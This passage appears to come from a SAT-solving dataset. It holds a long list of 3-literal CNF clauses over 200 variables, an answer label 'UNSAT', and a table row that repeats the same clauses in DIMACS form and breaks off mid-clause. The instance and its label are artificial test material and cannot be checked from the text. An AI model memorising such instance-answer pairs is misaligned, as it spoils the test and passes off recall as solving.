-139 -123 195 0
-41 -157 -58 0
25 -137 -52 0
61 -38 -57 0
-172 131 126 0
-104 90 -142 0
44 -198 179 0
16 -82 87 0
-134 14 48 0
-163 -64 24 0
-138 -127 -141 0
-51 -180 -54 0
-23 90 102 0
174 -118 -134 0
131 -69 -92 0
76 -111 -19 0
96 -72 151 0
42 -47 122 0
-99 -107 -17 0
-39 97 198 0
-111 159 66 0
133 -176 -30 0
-16 -58 87 0
-42 32 -94 0
-199 184 -146 0
-106 -7 -94 0
79 126 -185 0
-152 151 -13 0
-69 -184 25 0
-128 131 182 0
-192 29 -74 0
31 -177 -21 0
-123 30 -132 0
53 13 38 0
-3 185 -77 0
-167 -98 71 0
155 58 -90 0
143 -189 -174 0
91 110 -116 0
181 -157 19 0
-26 189 151 0
-63 167 2 0
-60 113 -57 0
64 -25 180 0
15 -12 97 0
-145 136 124 0
11 -73 -107 0
-135 -86 -73 0
-53 -166 -11 0
105 187 -102 0
22 1 -26 0
-12 142 -167 0
123 107 174 0
-26 -128 -162 0
-118 -74 133 0
95 -144 54 0
-1 -165 -188 0
-113 154 -175 0
92 -59 98 0
-111 70 -128 0
3 -21 89 0
87 -195 142 0
93 -144 -90 0
177 -120 52 0
169 141 -5 0
75 -10 -192 0
-33 -22 -66 0
6 183 196 0
-143 146 73 0
-168 124 -139 0
15 -17 124 0
-65 184 -82 0
-148 -100 -141 0
72 64 -10 0
-190 1 -150 0
2 -17 -96 0
-4 -160 105 0
-100 -122 -23 0
-102 22 -128 0
-139 181 102 0
-8 -105 120 0
-141 159 -174 0
112 124 122 0
-66 -167 131 0
155 -176 -27 0
44 -124 -103 0
-162 -142 63 0
46 -158 136 0
187 12 -90 0
-91 136 -24 0
147 130 -33 0
64 32 56 0
-54 -10 -179 0
-127 -132 -74 0
-123 -15 120 0
161 80 60 0
-72 116 113 0
85 -39 -160 0
12 125 -135 0
-20 -15 -195 0
109 -114 -185 0
115 -185 200 0
-90 -142 -80 0
19 -94 43 0
24 43 -57 0
-50 69 15 0
-117 -133 84 0
-163 -85 -35 0
91 70 175 0
-10 -20 127 0
144 40 -184 0
-104 -36 21 0
-122 131 18 0
59 115 16 0
154 -14 -8 0
-182 -105 20 0
198 -30 56 0
-57 -176 97 0
45 -195 191 0
55 193 -31 0
54 67 15 0
146 136 119 0
164 36 -100 0
4 -197 139 0
187 189 144 0
-183 36 154 0
47 173 -159 0
93 -78 -146 0
-170 9 131 0
-174 -186 38 0
102 29 -63 0
46 137 -138 0
-192 54 -17 0
-108 -54 5 0
-144 111 68 0
133 -69 35 0
30 -28 66 0
-62 156 31 0
157 -32 95 0
-73 21 144 0
-14 172 -30 0
-15 143 -107 0
-70 86 141 0
77 192 144 0
-80 -94 133 0
95 17 -148 0
66 15 159 0
-136 -58 62 0
75 -21 191 0
161 -12 175 0
-42 -117 -18 0
-192 147 -1 0
-28 -137 -151 0
41 17 146 0
-186 -182 105 0
-44 102 85 0
183 29 32 0
-84 32 167 0
21 -197 -172 0
-142 19 54 0
-107 -173 -143 0
-24 165 79 0
-138 -17 75 0
-93 -108 178 0
-104 77 138 0
-164 37 -97 0
51 55 -171 0
70 103 -191 0
-161 46 -13 0
-123 6 173 0
4 73 -60 0
-170 -114 -56 0
-179 -191 -172 0
149 145 43 0
-118 91 -51 0
-12 152 167 0
-196 -162 -9 0
-38 -17 -110 0
-96 -5 -36 0
97 109 -191 0
-89 -38 31 0
70 -184 94 0
-144 -146 11 0
-32 104 144 0
136 -163 -14 0
51 -4 -12 0
66 48 -153 0
-44 -10 8 0
54 106 102 0
5 58 78 0
-142 170 83 0
39 -173 -175 0
196 -149 104 0
160 4 44 0
-101 36 -50 0
-86 -62 -163 0
-85 -49 -169 0
-97 -145 93 0
147 35 38 0
13 28 -30 0
-64 -175 18 0
-144 129 33 0
-149 -158 -21 0
-152 -22 -92 0
-23 90 -111 0
189 -176 -65 0
-107 -94 -146 0
113 106 45 0
186 -47 -115 0
141 -4 -142 0
-93 -5 46 0
-183 -191 -187 0
18 12 168 0
-14 -30 177 0
-50 104 15 0
178 -165 -6 0
-55 7 -179 0
-77 -7 -135 0
28 106 -134 0
-138 -159 -192 0
-83 1 164 0
33 39 91 0
107 -170 72 0
179 -115 69 0
139 179 -88 0
99 68 154 0
-175 26 130 0
174 159 -134 0
-73 -182 -191 0
10 -28 16 0
119 36 -103 0
-35 51 -17 0
-197 -58 -185 0
-149 -155 166 0
-104 -155 -140 0
-48 -194 47 0
6 4 170 0
-51 189 -59 0
67 9 92 0
111 -149 -144 0
-17 -65 75 0
6 166 17 0
-55 -124 61 0
62 -175 77 0
46 81 -170 0
-158 159 -153 0
108 34 -31 0
118 133 1 0
137 -105 -63 0
138 51 -142 0
27 -57 -103 0
106 -158 -55 0
-180 -139 -199 0
-15 -151 182 0
24 -97 40 0
-152 -59 -85 0
-159 39 124 0
-157 55 -126 0
67 -140 36 0
109 -167 -187 0
51 189 -12 0
30 110 -190 0
-120 -3 -133 0
1 -81 -174 0
170 -77 123 0
-16 -64 48 0
51 9 -122 0
197 -90 76 0
-184 144 -156 0
-146 26 -186 0
44 -114 13 0
192 24 170 0
-14 144 177 0
-116 -45 189 0
-163 93 -78 0
-177 -196 -51 0
-165 104 4 0
140 -21 138 0
69 182 33 0
132 -54 183 0
16 -58 183 0
13 -132 -166 0
146 54 94 0
-156 -162 98 0
-60 -54 -145 0
-186 126 -75 0
-85 -3 148 0
190 -162 -6 0
-115 -30 32 0
-182 -113 22 0
21 -121 73 0
55 -82 87 0
-148 -36 182 0
-178 96 -183 0
-163 -179 43 0
-161 120 135 0
114 46 176 0
143 -79 -165 0
-32 60 100 0
18 -21 135 0
-140 173 127 0
-117 129 -102 0
110 -127 80 0
-91 61 200 0
-79 -168 198 0
144 -90 27 0
188 -196 -190 0
-5 -26 58 0
11 43 -195 0
-17 83 5 0
154 -72 17 0
-77 -167 -67 0
-33 60 68 0
-137 -37 22 0
69 54 -80 0
119 -141 -73 0
124 -193 -81 0
123 164 -94 0
-179 119 51 0
21 -84 -72 0
146 -8 -50 0
-200 198 190 0
-138 161 68 0
-139 134 -58 0
-121 85 -133 0
-5 -186 71 0
-188 -106 184 0
122 -3 10 0
1 144 -85 0
-117 19 -123 0
-158 23 -90 0
96 -125 -141 0
-25 136 40 0
134 -81 -76 0
84 -167 -99 0
141 -110 -115 0
-95 98 -73 0
-151 31 -183 0
168 -44 -129 0
162 32 -111 0
-10 106 164 0
-46 -117 -163 0
-10 -39 162 0
54 -139 -119 0
73 -67 173 0
67 92 -64 0
-84 51 194 0
61 -74 -41 0
-61 -24 57 0
186 -27 82 0
-156 41 -127 0
102 -179 89 0
-71 155 33 0
61 -68 55 0
193 -78 57 0
6 -120 -110 0
-103 -52 5 0
-54 184 -62 0
-115 -39 -174 0
58 196 152 0
-152 -3 -142 0
1 -83 142 0
-77 24 -131 0
123 122 -2 0
-41 -147 -163 0
102 -60 -84 0
-118 70 193 0
-44 -156 23 0
-8 147 -114 0
93 115 -72 0
125 -158 -148 0
-151 -28 -71 0
151 -75 -65 0
-186 -41 193 0
-141 -119 -147 0
-196 51 31 0
-119 164 19 0
51 -40 101 0
94 -171 -175 0
120 130 -84 0
-74 -64 -150 0
-133 72 78 0
-45 118 105 0
67 164 -137 0
-176 -89 -158 0
-168 80 12 0
167 -168 -8 0
182 84 7 0
-13 165 -124 0
95 -187 -193 0
184 -91 80 0
-15 -35 -71 0
-9 137 68 0
76 -75 -87 0
-59 -120 -154 0
-131 8 55 0
43 -89 -108 0
89 148 56 0
-166 -9 42 0
-192 -95 133 0
195 -182 -124 0
-29 199 -3 0
-11 -186 -8 0
195 -110 65 0
-12 167 85 0
-41 50 117 0
-192 11 -181 0
86 -194 -165 0
-29 -111 93 0
122 5 -92 0
13 -79 108 0
-89 184 95 0
-142 -127 66 0
-110 81 104 0
-154 -44 9 0
-159 -143 -12 0
120 14 -8 0
-114 102 -172 0
22 149 -108 0
-151 -152 -20 0
-101 -22 110 0
-43 -115 176 0
68 -61 51 0
105 -63 -112 0
177 -179 185 0
113 39 -111 0
138 -115 133 0
-153 -91 -52 0
-189 -22 -49 0
-195 -20 30 0
-45 89 137 0
-199 126 143 0
194 147 7 0
35 53 -50 0
-194 -87 116 0
-73 70 -83 0
145 -129 54 0
-195 -127 -16 0
-174 -20 128 0
-40 -172 120 0
195 -97 184 0
-51 155 63 0
91 168 -176 0
-193 167 1 0
153 35 83 0
122 145 185 0
-31 87 -64 0
1 21 53 0
37 -169 120 0
130 -48 -86 0
-27 -34 79 0
-61 181 -57 0
12 68 -4 0
-66 198 -99 0
-110 50 -66 0
-88 -26 -74 0
-35 64 187 0
-78 -197 190 0
191 -137 47 0
75 -18 63 0
190 166 72 0
98 -120 -88 0
-163 -14 140 0
-144 -149 -86 0
114 146 -69 0
-179 182 144 0
98 -186 -46 0
16 3 -166 0
-196 88 -150 0
190 35 166 0
-191 178 18 0
195 -111 41 0
-63 190 184 0
119 159 28 0
-167 -125 6 0
-173 49 -147 0
-174 -82 -129 0
-24 -16 -53 0
-79 -122 -64 0
-119 190 -129 0
-29 -106 -152 0
22 -110 143 0
-45 54 40 0
-155 -103 -2 0
-195 -139 131 0
145 -48 -64 0
115 -181 79 0
-190 145 -5 0
-92 164 -47 0
-75 127 -169 0
-10 -100 193 0
-129 37 -167 0
106 20 172 0
-43 -40 -129 0
-7 107 -133 0
-73 -84 161 0
-78 94 80 0
4 -129 149 0
-47 58 118 0
-120 116 -155 0
-100 -87 78 0
106 141 190 0
-15 22 86 0
187 174 -90 0
61 -21 -153 0
-12 -200 -95 0
-85 -158 114 0
-15 -172 150 0
54 -36 96 0
122 35 95 0
185 149 -68 0
-138 46 -56 0
115 39 -119 0
-83 -131 -12 0
92 157 192 0
-33 107 -198 0
122 182 -7 0
-71 65 63 0
107 -178 46 0
166 3 87 0
-52 18 -131 0
-138 -196 -48 0
-128 -37 50 0
125 -194 -101 0
-36 20 23 0
-6 -127 -2 0
103 -137 -60 0
86 77 117 0
200 171 -16 0
91 -5 -48 0
115 -2 85 0
151 -55 41 0
-46 -1 171 0
164 173 -105 0
15 46 -126 0
-161 117 107 0
140 84 -49 0
-167 194 77 0
136 71 -70 0
196 75 47 0
54 103 126 0
-77 159 -147 0
21 18 108 0
172 31 85 0
180 -44 -198 0
42 -122 39 0
179 -52 -106 0
79 146 -105 0
-120 156 69 0
15 -153 -10 0
-118 -113 -33 0
-129 56 34 0
-8 -199 73 0
-103 -133 147 0
-177 -42 54 0
162 -168 55 0
17 -107 -34 0
-62 -149 -199 0
168 -93 135 0
74 128 62 0
117 158 188 0
-139 -164 -118 0
62 29 57 0
86 -28 124 0
-198 -51 -68 0
-139 -113 -98 0
23 -98 -171 0
-121 -139 -53 0
-138 -92 67 0
-146 3 -103 0
-190 126 83 0
131 -87 21 0
117 107 -69 0
16 183 -4 0
150 -200 -18 0
179 -184 -193 0
108 -7 -178 0
-112 27 97 0
37 -61 13 0
188 82 101 0
-4 -124 -46 0
53 188 74 0
-14 129 194 0
25 60 94 0
-190 -5 119 0
-54 11 -166 0
-102 -77 158 0
91 -20 -102 0
160 58 46 0
124 -164 -147 0
65 -38 -157 0
91 -86 122 0
-191 69 -167 0
-172 -138 118 0
-52 61 145 0
-31 41 -4 0
-77 -38 33 0
-97 162 -26 0
-121 25 153 0
68 -48 142 0
130 65 50 0
-103 115 177 0
-56 126 158 0
99 162 -171 0
6 168 -55 0
34 -61 77 0
-23 158 -101 0
127 136 20 0
146 180 106 0
130 32 -173 0
13 169 198 0
-108 59 -42 0
87 -162 173 0
196 173 157 0
12 186 -135 0
-60 117 177 0
-22 -96 -27 0
-116 -94 141 0
-137 -170 164 0
-110 106 -13 0
35 -118 106 0
-167 190 45 0
127 -187 -196 0
-50 41 -132 0
143 121 169 0
-62 -69 -68 0
-60 198 -18 0
-62 58 -158 0
135 10 -68 0
-145 -10 -36 0
-187 -91 131 0
195 84 36 0
-181 50 -79 0
12 61 -14 0
139 -30 -123 0
-51 -184 39 0
-37 23 18 0
191 -120 156 0
83 103 124 0
-171 199 156 0
-41 64 -157 0
-181 162 199 0
8 -158 -160 0
-21 -37 163 0
42 137 190 0
-123 -70 50 0
9 127 187 0
16 169 -114 0
179 142 28 0
7 147 191 0
48 -58 -198 0
-118 -10 185 0
57 -107 -106 0
65 96 173 0
54 64 66 0
-160 193 -101 0
199 65 -76 0
-141 138 157 0
81 102 163 0
180 -132 -134 0
154 5 175 0
-120 42 -64 0
109 -143 88 0
75 71 77 0
-19 -10 -123 0
12 45 71 0
127 -158 199 0
98 -198 120 0
-116 129 166 0
124 -186 -34 0
-63 -140 195 0
-162 172 19 0
190 107 76 0
-108 -193 -24 0
-54 -148 -132 0
158 184 83 0
-75 -4 101 0
49 96 17 0
-19 104 -73 0
197 159 101 0
172 196 3 0
-132 192 -120 0
-151 -92 -200 0
-147 -128 -179 0
89 188 191 0
-152 -102 -175 0
177 -133 -127 0
-69 -80 -154 0
160 -122 -67 0
117 95 31 0
187 -114 55 0
-52 102 -18 0
-34 -111 -131 0
70 93 -152 0
-72 -58 -60 0
-151 196 -59 0
12 -159 -1 0
-173 133 167 0
198 61 166 0
-188 94 8 0
-156 39 -2 0
184 -151 -89 0
-112 -160 -144 0
156 35 123 0
27 -84 105 0
-166 -50 157 0
-168 -26 179 0
74 96 94 0
199 195 178 0
114 -27 144 0
48 105 53 0
128 -117 -34 0
-28 -109 -159 0
197 40 23 0
142 20 -42 0
-21 103 -12 0
122 -31 40 0
-24 -10 -57 0
110 -123 72 0
114 20 -160 0
-14 94 -121 0
-31 195 -163 0
-98 -45 143 0
-110 -3 -195 0
142 86 -186 0
194 -125 28 0
-60 129 -180 0
134 141 197 0
-92 -68 30 0
182 6 96 0
146 -195 14 0
-78 -56 -61 0
-78 139 144 0
-190 -48 -163 0
-19 -40 -181 0
-92 -191 25 0
-156 122 38 0
195 13 -190 0
99 -57 -184 0
141 -124 -113 0
-81 38 40 0
68 199 -12 0
-178 -118 -20 0
-188 183 -96 0
190 144 121 0
43 -111 40 0
-10 -39 -68 0
-42 -17 83 0
-135 -101 -82 0
-153 198 -23 0
-188 -86 146 0
-26 -126 -89 0
-113 135 93 0
-161 20 -162 0
165 1 106 0
-159 -27 79 0
78 -60 184 0
79 -53 -166 0
106 170 -55 0
-19 -30 90 0
-152 176 56 0
-108 91 -50 0
-104 100 -171 0
85 -197 -93 0
99 106 12 0
20 -108 -103 0
-142 -92 137 0
70 75 -10 0
30 51 -129 0
-132 -38 63 0
-59 66 48 0
-88 -118 43 0
-71 200 -182 0
6 -177 -172 0
"""
output = "UNSAT"
| fr | 0.14599 | c num blocks = 1 c num vars = 200 c minblockids[0] = 1 c maxblockids[0] = 200 p cnf 200 890 -80 -16 -14 0 -14 -200 -190 0 61 -149 133 0 -86 -126 -9 0 11 -79 -15 0 -119 -191 -174 0 -154 -29 -134 0 -78 -118 76 0 -106 119 173 0 131 -140 -141 0 64 18 -147 0 -132 -12 158 0 122 -143 -117 0 -5 80 -128 0 -113 -108 -171 0 62 -134 -159 0 63 118 12 0 -127 -98 41 0 -190 172 -182 0 153 -77 143 0 -142 138 53 0 -70 -125 -160 0 120 195 108 0 -177 -184 -106 0 -168 175 160 0 -153 -84 -96 0 -42 133 190 0 -24 -78 -162 0 5 -105 73 0 105 19 -130 0 151 -142 -95 0 86 -156 173 0 180 172 98 0 186 130 65 0 -84 126 -57 0 -88 8 -126 0 43 -172 -185 0 -99 149 -83 0 13 61 169 0 197 -56 -142 0 98 73 118 0 -124 9 -90 0 150 29 72 0 13 -59 183 0 -7 23 78 0 67 1 -158 0 -151 142 -35 0 -62 198 -99 0 -43 -111 157 0 -197 -193 -141 0 -179 5 -50 0 105 74 134 0 -86 12 33 0 71 -151 88 0 -119 11 -48 0 -133 158 53 0 196 -64 -199 0 186 42 -105 0 -137 189 139 0 -95 46 3 0 -160 -41 -176 0 -12 -173 20 0 146 149 21 0 -174 -103 164 0 -21 -96 145 0 -191 137 97 0 32 -183 180 0 -130 78 59 0 -5 157 166 0 167 -112 -179 0 -10 107 -161 0 54 -34 93 0 -138 47 -193 0 -42 -8 159 0 -84 35 93 0 -182 -100 32 0 -50 101 63 0 23 22 167 0 -21 -77 134 0 111 -107 159 0 -77 -7 114 0 40 41 -166 0 165 -21 15 0 -100 166 80 0 -118 162 -180 0 -190 62 -159 0 -72 113 -2 0 -110 167 -45 0 -79 -143 138 0 172 126 32 0 -117 43 -102 0 -12 81 -58 0 54 191 171 0 -161 -103 -126 0 99 28 143 0 138 111 -42 0 112 95 -88 0 167 -95 140 0 87 -150 105 0 -39 65 -81 0 -115 145 104 0 -118 22 3 0 63 -16 197 0 128 -153 -100 0 -139 5 -166 0 37 68 171 0 82 9 -125 0 191 -59 77 0 71 82 -2 0 -8 134 74 0 -32 -44 165 0 -101 114 -131 0 51 199 -46 0 110 -90 -6 0 -187 -21 -139 0 -154 12 -140 0 -139 -123 195 0 -41 -157 -58 0 25 -137 -52 0 61 -38 -57 0 -172 131 126 0 -104 90 -142 0 44 -198 179 0 16 -82 87 0 -134 14 48 0 -163 -64 24 0 -138 -127 -141 0 -51 -180 -54 0 -23 90 102 0 174 -118 -134 0 131 -69 -92 0 76 -111 -19 0 96 -72 151 0 42 -47 122 0 -99 -107 -17 0 -39 97 198 0 -111 159 66 0 133 -176 -30 0 -16 -58 87 0 -42 32 -94 0 -199 184 -146 0 -106 -7 -94 0 79 126 -185 0 -152 151 -13 0 -69 -184 25 0 -128 131 182 0 -192 29 -74 0 31 -177 -21 0 -123 30 -132 0 53 13 38 0 -3 185 -77 0 -167 -98 71 0 155 58 -90 0 143 -189 -174 0 91 110 -116 0 181 -157 19 0 -26 189 151 0 -63 167 2 0 -60 113 -57 0 64 -25 180 0 15 -12 97 0 -145 136 124 0 11 -73 -107 0 -135 -86 -73 0 -53 -166 -11 0 105 187 -102 0 22 1 -26 0 -12 142 -167 0 123 107 174 0 -26 -128 -162 0 -118 -74 133 0 95 -144 54 0 -1 -165 -188 0 -113 154 -175 0 92 -59 98 0 -111 70 -128 0 3 -21 89 0 87 -195 142 0 93 -144 -90 0 177 -120 52 0 169 141 -5 0 75 -10 -192 0 -33 -22 -66 0 6 183 196 0 -143 146 73 0 -168 124 -139 0 15 -17 124 0 -65 184 -82 0 -148 -100 -141 0 72 64 -10 0 -190 1 -150 0 2 -17 -96 0 -4 -160 105 0 -100 -122 -23 0 -102 22 -128 0 -139 181 102 0 -8 -105 120 0 -141 159 -174 0 112 124 122 0 -66 -167 131 0 155 -176 -27 0 44 -124 -103 0 -162 -142 63 0 46 -158 136 0 187 12 -90 0 -91 136 -24 0 147 130 -33 0 64 32 56 0 -54 -10 -179 0 -127 -132 -74 0 -123 -15 120 0 161 80 60 0 -72 116 113 0 85 -39 -160 0 12 125 -135 0 -20 -15 -195 0 109 -114 -185 0 115 -185 200 0 -90 -142 -80 0 19 -94 43 0 24 43 -57 0 -50 69 15 0 -117 -133 84 0 -163 -85 -35 0 91 70 175 0 -10 -20 127 0 144 40 -184 0 -104 -36 21 0 -122 131 18 0 59 115 16 0 154 -14 -8 0 -182 -105 20 0 198 -30 56 0 -57 -176 97 0 45 -195 191 0 55 193 -31 0 54 67 15 0 146 136 119 0 164 36 -100 0 4 -197 139 0 187 189 144 0 -183 36 154 0 47 173 -159 0 93 -78 -146 0 -170 9 131 0 -174 -186 38 0 102 29 
-63 0 46 137 -138 0 -192 54 -17 0 -108 -54 5 0 -144 111 68 0 133 -69 35 0 30 -28 66 0 -62 156 31 0 157 -32 95 0 -73 21 144 0 -14 172 -30 0 -15 143 -107 0 -70 86 141 0 77 192 144 0 -80 -94 133 0 95 17 -148 0 66 15 159 0 -136 -58 62 0 75 -21 191 0 161 -12 175 0 -42 -117 -18 0 -192 147 -1 0 -28 -137 -151 0 41 17 146 0 -186 -182 105 0 -44 102 85 0 183 29 32 0 -84 32 167 0 21 -197 -172 0 -142 19 54 0 -107 -173 -143 0 -24 165 79 0 -138 -17 75 0 -93 -108 178 0 -104 77 138 0 -164 37 -97 0 51 55 -171 0 70 103 -191 0 -161 46 -13 0 -123 6 173 0 4 73 -60 0 -170 -114 -56 0 -179 -191 -172 0 149 145 43 0 -118 91 -51 0 -12 152 167 0 -196 -162 -9 0 -38 -17 -110 0 -96 -5 -36 0 97 109 -191 0 -89 -38 31 0 70 -184 94 0 -144 -146 11 0 -32 104 144 0 136 -163 -14 0 51 -4 -12 0 66 48 -153 0 -44 -10 8 0 54 106 102 0 5 58 78 0 -142 170 83 0 39 -173 -175 0 196 -149 104 0 160 4 44 0 -101 36 -50 0 -86 -62 -163 0 -85 -49 -169 0 -97 -145 93 0 147 35 38 0 13 28 -30 0 -64 -175 18 0 -144 129 33 0 -149 -158 -21 0 -152 -22 -92 0 -23 90 -111 0 189 -176 -65 0 -107 -94 -146 0 113 106 45 0 186 -47 -115 0 141 -4 -142 0 -93 -5 46 0 -183 -191 -187 0 18 12 168 0 -14 -30 177 0 -50 104 15 0 178 -165 -6 0 -55 7 -179 0 -77 -7 -135 0 28 106 -134 0 -138 -159 -192 0 -83 1 164 0 33 39 91 0 107 -170 72 0 179 -115 69 0 139 179 -88 0 99 68 154 0 -175 26 130 0 174 159 -134 0 -73 -182 -191 0 10 -28 16 0 119 36 -103 0 -35 51 -17 0 -197 -58 -185 0 -149 -155 166 0 -104 -155 -140 0 -48 -194 47 0 6 4 170 0 -51 189 -59 0 67 9 92 0 111 -149 -144 0 -17 -65 75 0 6 166 17 0 -55 -124 61 0 62 -175 77 0 46 81 -170 0 -158 159 -153 0 108 34 -31 0 118 133 1 0 137 -105 -63 0 138 51 -142 0 27 -57 -103 0 106 -158 -55 0 -180 -139 -199 0 -15 -151 182 0 24 -97 40 0 -152 -59 -85 0 -159 39 124 0 -157 55 -126 0 67 -140 36 0 109 -167 -187 0 51 189 -12 0 30 110 -190 0 -120 -3 -133 0 1 -81 -174 0 170 -77 123 0 -16 -64 48 0 51 9 -122 0 197 -90 76 0 -184 144 -156 0 -146 26 -186 0 44 -114 13 0 192 24 170 0 -14 144 177 0 -116 -45 189 0 -163 93 -78 0 -177 -196 -51 0 -165 104 4 0 140 -21 138 0 69 182 33 0 132 -54 183 0 16 -58 183 0 13 -132 -166 0 146 54 94 0 -156 -162 98 0 -60 -54 -145 0 -186 126 -75 0 -85 -3 148 0 190 -162 -6 0 -115 -30 32 0 -182 -113 22 0 21 -121 73 0 55 -82 87 0 -148 -36 182 0 -178 96 -183 0 -163 -179 43 0 -161 120 135 0 114 46 176 0 143 -79 -165 0 -32 60 100 0 18 -21 135 0 -140 173 127 0 -117 129 -102 0 110 -127 80 0 -91 61 200 0 -79 -168 198 0 144 -90 27 0 188 -196 -190 0 -5 -26 58 0 11 43 -195 0 -17 83 5 0 154 -72 17 0 -77 -167 -67 0 -33 60 68 0 -137 -37 22 0 69 54 -80 0 119 -141 -73 0 124 -193 -81 0 123 164 -94 0 -179 119 51 0 21 -84 -72 0 146 -8 -50 0 -200 198 190 0 -138 161 68 0 -139 134 -58 0 -121 85 -133 0 -5 -186 71 0 -188 -106 184 0 122 -3 10 0 1 144 -85 0 -117 19 -123 0 -158 23 -90 0 96 -125 -141 0 -25 136 40 0 134 -81 -76 0 84 -167 -99 0 141 -110 -115 0 -95 98 -73 0 -151 31 -183 0 168 -44 -129 0 162 32 -111 0 -10 106 164 0 -46 -117 -163 0 -10 -39 162 0 54 -139 -119 0 73 -67 173 0 67 92 -64 0 -84 51 194 0 61 -74 -41 0 -61 -24 57 0 186 -27 82 0 -156 41 -127 0 102 -179 89 0 -71 155 33 0 61 -68 55 0 193 -78 57 0 6 -120 -110 0 -103 -52 5 0 -54 184 -62 0 -115 -39 -174 0 58 196 152 0 -152 -3 -142 0 1 -83 142 0 -77 24 -131 0 123 122 -2 0 -41 -147 -163 0 102 -60 -84 0 -118 70 193 0 -44 -156 23 0 -8 147 -114 0 93 115 -72 0 125 -158 -148 0 -151 -28 -71 0 151 -75 -65 0 -186 -41 193 0 -141 -119 -147 0 -196 51 31 0 -119 164 19 0 51 -40 101 0 94 -171 -175 0 120 130 -84 0 -74 -64 -150 0 -133 72 78 0 -45 118 105 0 67 164 -137 0 -176 -89 -158 0 -168 80 12 0 167 -168 
-8 0 182 84 7 0 -13 165 -124 0 95 -187 -193 0 184 -91 80 0 -15 -35 -71 0 -9 137 68 0 76 -75 -87 0 -59 -120 -154 0 -131 8 55 0 43 -89 -108 0 89 148 56 0 -166 -9 42 0 -192 -95 133 0 195 -182 -124 0 -29 199 -3 0 -11 -186 -8 0 195 -110 65 0 -12 167 85 0 -41 50 117 0 -192 11 -181 0 86 -194 -165 0 -29 -111 93 0 122 5 -92 0 13 -79 108 0 -89 184 95 0 -142 -127 66 0 -110 81 104 0 -154 -44 9 0 -159 -143 -12 0 120 14 -8 0 -114 102 -172 0 22 149 -108 0 -151 -152 -20 0 -101 -22 110 0 -43 -115 176 0 68 -61 51 0 105 -63 -112 0 177 -179 185 0 113 39 -111 0 138 -115 133 0 -153 -91 -52 0 -189 -22 -49 0 -195 -20 30 0 -45 89 137 0 -199 126 143 0 194 147 7 0 35 53 -50 0 -194 -87 116 0 -73 70 -83 0 145 -129 54 0 -195 -127 -16 0 -174 -20 128 0 -40 -172 120 0 195 -97 184 0 -51 155 63 0 91 168 -176 0 -193 167 1 0 153 35 83 0 122 145 185 0 -31 87 -64 0 1 21 53 0 37 -169 120 0 130 -48 -86 0 -27 -34 79 0 -61 181 -57 0 12 68 -4 0 -66 198 -99 0 -110 50 -66 0 -88 -26 -74 0 -35 64 187 0 -78 -197 190 0 191 -137 47 0 75 -18 63 0 190 166 72 0 98 -120 -88 0 -163 -14 140 0 -144 -149 -86 0 114 146 -69 0 -179 182 144 0 98 -186 -46 0 16 3 -166 0 -196 88 -150 0 190 35 166 0 -191 178 18 0 195 -111 41 0 -63 190 184 0 119 159 28 0 -167 -125 6 0 -173 49 -147 0 -174 -82 -129 0 -24 -16 -53 0 -79 -122 -64 0 -119 190 -129 0 -29 -106 -152 0 22 -110 143 0 -45 54 40 0 -155 -103 -2 0 -195 -139 131 0 145 -48 -64 0 115 -181 79 0 -190 145 -5 0 -92 164 -47 0 -75 127 -169 0 -10 -100 193 0 -129 37 -167 0 106 20 172 0 -43 -40 -129 0 -7 107 -133 0 -73 -84 161 0 -78 94 80 0 4 -129 149 0 -47 58 118 0 -120 116 -155 0 -100 -87 78 0 106 141 190 0 -15 22 86 0 187 174 -90 0 61 -21 -153 0 -12 -200 -95 0 -85 -158 114 0 -15 -172 150 0 54 -36 96 0 122 35 95 0 185 149 -68 0 -138 46 -56 0 115 39 -119 0 -83 -131 -12 0 92 157 192 0 -33 107 -198 0 122 182 -7 0 -71 65 63 0 107 -178 46 0 166 3 87 0 -52 18 -131 0 -138 -196 -48 0 -128 -37 50 0 125 -194 -101 0 -36 20 23 0 -6 -127 -2 0 103 -137 -60 0 86 77 117 0 200 171 -16 0 91 -5 -48 0 115 -2 85 0 151 -55 41 0 -46 -1 171 0 164 173 -105 0 15 46 -126 0 -161 117 107 0 140 84 -49 0 -167 194 77 0 136 71 -70 0 196 75 47 0 54 103 126 0 -77 159 -147 0 21 18 108 0 172 31 85 0 180 -44 -198 0 42 -122 39 0 179 -52 -106 0 79 146 -105 0 -120 156 69 0 15 -153 -10 0 -118 -113 -33 0 -129 56 34 0 -8 -199 73 0 -103 -133 147 0 -177 -42 54 0 162 -168 55 0 17 -107 -34 0 -62 -149 -199 0 168 -93 135 0 74 128 62 0 117 158 188 0 -139 -164 -118 0 62 29 57 0 86 -28 124 0 -198 -51 -68 0 -139 -113 -98 0 23 -98 -171 0 -121 -139 -53 0 -138 -92 67 0 -146 3 -103 0 -190 126 83 0 131 -87 21 0 117 107 -69 0 16 183 -4 0 150 -200 -18 0 179 -184 -193 0 108 -7 -178 0 -112 27 97 0 37 -61 13 0 188 82 101 0 -4 -124 -46 0 53 188 74 0 -14 129 194 0 25 60 94 0 -190 -5 119 0 -54 11 -166 0 -102 -77 158 0 91 -20 -102 0 160 58 46 0 124 -164 -147 0 65 -38 -157 0 91 -86 122 0 -191 69 -167 0 -172 -138 118 0 -52 61 145 0 -31 41 -4 0 -77 -38 33 0 -97 162 -26 0 -121 25 153 0 68 -48 142 0 130 65 50 0 -103 115 177 0 -56 126 158 0 99 162 -171 0 6 168 -55 0 34 -61 77 0 -23 158 -101 0 127 136 20 0 146 180 106 0 130 32 -173 0 13 169 198 0 -108 59 -42 0 87 -162 173 0 196 173 157 0 12 186 -135 0 -60 117 177 0 -22 -96 -27 0 -116 -94 141 0 -137 -170 164 0 -110 106 -13 0 35 -118 106 0 -167 190 45 0 127 -187 -196 0 -50 41 -132 0 143 121 169 0 -62 -69 -68 0 -60 198 -18 0 -62 58 -158 0 135 10 -68 0 -145 -10 -36 0 -187 -91 131 0 195 84 36 0 -181 50 -79 0 12 61 -14 0 139 -30 -123 0 -51 -184 39 0 -37 23 18 0 191 -120 156 0 83 103 124 0 -171 199 156 0 -41 64 -157 0 -181 162 199 0 8 -158 -160 
